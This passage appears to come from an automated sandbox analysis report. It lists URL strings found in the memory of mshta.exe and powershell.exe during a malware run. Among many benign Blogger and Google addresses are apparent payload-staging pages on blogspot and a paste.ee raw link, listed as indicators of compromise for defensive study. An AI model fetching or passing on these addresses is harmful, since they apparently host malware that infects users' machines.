              Source: mshta.exe, 00000006.00000003.2242124105.00000000075EA000.00000004.00000001.sdmpString found in binary or memory: http://www.cookiechoices.org/
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
              Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
              Source: powershell.exe, 0000000C.00000003.2212263434.00000000002F2000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
              Source: powershell.exe, 0000000C.00000003.2212263434.00000000002F2000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
              Source: powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/
              Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246295022.0000000005886000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhtt
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
              Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com/js/plusone.js
              Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262198982.00000000001B3000.00000004.00000001.sdmpString found in binary or memory: https://backbones1234511a.blogspot.com/p/stback1.html
              Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: https://csi.gstatic.com/csi
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?lang=en-GB&family=Product
              Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmpString found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://i18n-cloud.appspot.com
              Source: mshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogs
              Source: mshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot
              Source: mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/
              Source: mshta.exe, 00000006.00000003.2251705614.0000000003480000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/(
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/Q
              Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/favicon.ico
              Source: mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/favicon.icoe
              Source: mshta.exe, 00000006.00000003.2262320859.00000000001CA000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/p
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default
              Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default?alt
              Source: mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default?alt=rss
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/defaultA
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/defaultng
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.js
              Source: mshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsA
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsi
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsp
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jspnga
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/
              Source: mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/----
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/X
              Source: mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/nap
              Source: mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html%26bpli%3D1&followup=https://www.blogger.com/blogi
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html.
              Source: mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html...
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html0E)
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html5
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html?interstitial=ABqL8_iitRI9UzgP0mZhOmXtKCBQT4eYHp3t
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlC
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlD
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlK
              Source: mshta.exe, 00000006.00000003.2220203351.0000000003474000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlabbr
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlcomment_from_post_iframe.js
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmld
              Source: mshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdja
              Source: mshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdjasgdakgsdhv
              Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlgspo
              Source: mshta.exe, 00000006.00000003.2252538010.0000000002DE3000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlhttps://www.blogger.com/static/v1/jsbin/376796862-
              Source: mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlkj
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmls
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlse
              Source: mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlte
              Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlvg
              Source: mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlw
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlwidgets.js91100&pageID=8792113328696570758
              Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/search
              Source: mshta.exe, 00000006.00000003.2251705614.0000000003480000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/searchhttps://apis.google.com/js/plusone.js
              Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.cost2222.html
              Source: powershell.exe, 0000000C.00000002.2240980870.000000000036F000.00000004.00000020.sdmpString found in binary or memory: https://paste.ee/r/9IDWy
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
              Source: mshta.exe, 00000011.00000003.2221428662.0000000000125000.00000004.00000001.sdmpString found in binary or memory: https://randikhanaekminar.blogspot.com/p/st2.html
              Source: mshta.exe, 00000011.00000003.2218959976.0000000003A2C000.00000004.00000001.sdmpString found in binary or memory: https://randikhanaekminar.blogspot.com/p/st2.htmlC:
              Source: mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png).meather)
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png0C;
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.pngx6
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
              Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250127920.0000000003B45000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307664079.0000000005858000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png)
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png:
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngt.co
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gif
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gifogID=9116518222795791100&zx=6c18238f-a384-4
              Source: mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png#
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png;
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngk
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngq
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngrom_post_iframe.js
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif)
              Source: mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/triangle_open.gif
              Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/widgets/icon_contactform_cross.gif
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264900339.000000000047B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png)
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png)
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp | String found in binary or memory: https://s.ytimg.com
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
              Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp | String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone14.html
              Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp | String found in binary or memory: https://twitter.com/intent/tweet?text=
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogblog.com;
              Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/?tab=jj
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308484243.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221567445.0000000003B49000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://mainjigijigi123.blogspot.com/p/st2222.html%26
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264173240.00000000057E2000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html$
              Source: mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html0E)
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlH
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlgspo
              Source: mshta.exe, 00000006.00000003.2241524951.000000000306E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758
              Source: mshta.exe, 00000006.00000003.2251330504.0000000003472000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758&blogs
              Source: mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=87921133286965707584.0E)
              Source: mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758QV
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9116518222795791100&zx=6c18238f-a
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2264656702.0000000005790000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp | String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9116518222795791100&zx=6c18238f-a384-
              Source: mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/feeds/9116518222795791100/posts/default
              Source: mshta.exe, 00000006.00000003.2235127102.000000000340C000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/go/adspersonalization
              Source: mshta.exe, 00000006.00000003.2225510825.000000000347F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/go/blogspot-cookies
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/go/buzz
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/go/contentpolicy
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/go/devapi
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/go/devforum
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/go/discuss
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/go/helpcenter
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/go/privacy
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/go/terms
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/go/tutorials
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pnga
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp | String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngcomment_from_post_iframe.jspng
              Source: mshta.exe, 00000006.00000003.2264609291.00000000057CD000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngmple/gradients_light.pngight.pngom%2Fp%2Fst2222.ht
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngv
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngx
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/page-edit.g?blogID=9116518222795791100&pageID=8792113328696570758&from=penci
              Source: mshta.exe, 00000006.00000003.2259640260.0000000003069000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp | String found in binary or memory: https://www.blogger.com/rpc_relay.html
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=bl
